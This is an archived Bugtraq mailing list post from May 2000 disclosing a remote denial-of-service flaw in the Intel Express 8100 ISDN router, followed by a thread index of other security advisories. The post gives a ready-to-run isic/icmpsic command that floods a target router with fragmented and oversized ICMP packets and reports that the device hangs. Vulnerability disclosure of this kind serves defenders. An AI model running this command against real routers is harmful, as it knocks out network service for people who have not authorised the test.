Bugtraq mailing list archives

Remote Dos attack against Intel express 8100 router

From: dparussalla () BAYSIDEGRP COM AU (Dimuthu Parussalla)
Date: Fri, 19 May 2000 11:13:28 +1000


Remote Dos attack against Intel express 8100 router
---------------------------------------------------

Intel express 8100 isdn router vulnerable for remote icmp fragmented packets
and oversize packets.

exploit demonstrate as follows..

Download libnet and isic-0.05 test following exploit. And do the following
command to generate oversized and fragmented packets.

./icmpsic -s 127.0.0.1,23 -d <target.router.ip.address> -F 100

After a couple of minutes router hangs.

No patch from the vendor yet

Current thread:

announce : Nessus 1.0 released, (continued)
- - - announce : Nessus 1.0 released Renaud Deraison (May 17)
    - RFP2K04: Mining BlackICE with RFPickAxe rain forest puppy (May 17)
    - FreeBSD Security Advisory: FreeBSD-SA-00:08.lynx [REVISED] FreeBSD Security Officer (May 17)
    - klogin remote exploit duke (May 17)
    - Re: RFP2K04: Mining BlackICE with RFPickAxe Robert Graham (May 17)
    - antisniff latest ("two times fixed") version still exploitable, l0phtl0phe-kid.c Sebastian (May 18)
    - Re: antisniff latest ("two times fixed") version still exploitable, l0phtl0phe-kid.c Mudge (May 18)
    - Re: RFP2K04: Mining BlackICE with RFPickAxe Matt (May 18)
    - AUX Security Advisory on Be/OS 5.0 (DoS) visi0n (May 17)
    - Re: RFP2K04: Mining BlackICE with RFPickAxe Andrew Lambeth (May 19)
    - Remote Dos attack against Intel express 8100 router Dimuthu Parussalla (May 18)
    - RFP2K05: NetProwler vs. RFProwler rain forest puppy (May 19)
    - Key Generation Security Flaw in PGP 5.0 gec () ACM ORG (May 23)
    - Filesystem vulnerability in AIX salme () US IBM COM (May 23)
    - Re: RFP2K05: NetProwler vs. RFProwler Pedro Quintanilha (May 23)
    - Security Vulnerability in Qpopper 2.53 (Upgrade to 3.0.2) Qpopper Support (May 23)
    - Remote xploit for MDBMS |[TDP]| (May 24)
    - HP Web JetAdmin Version 6.0 Remote DoS attack Vulnerability Ussr Labs (May 24)
    - Re: RFP2K04: Mining BlackICE with RFPickAxe rain forest puppy (May 19)
    - revised patches for kerberos vulnerability Tom Yu (May 19)
    - Microsoft Security Bulletin (MS00-029) Microsoft Product Security (May 19)

(Thread continues...)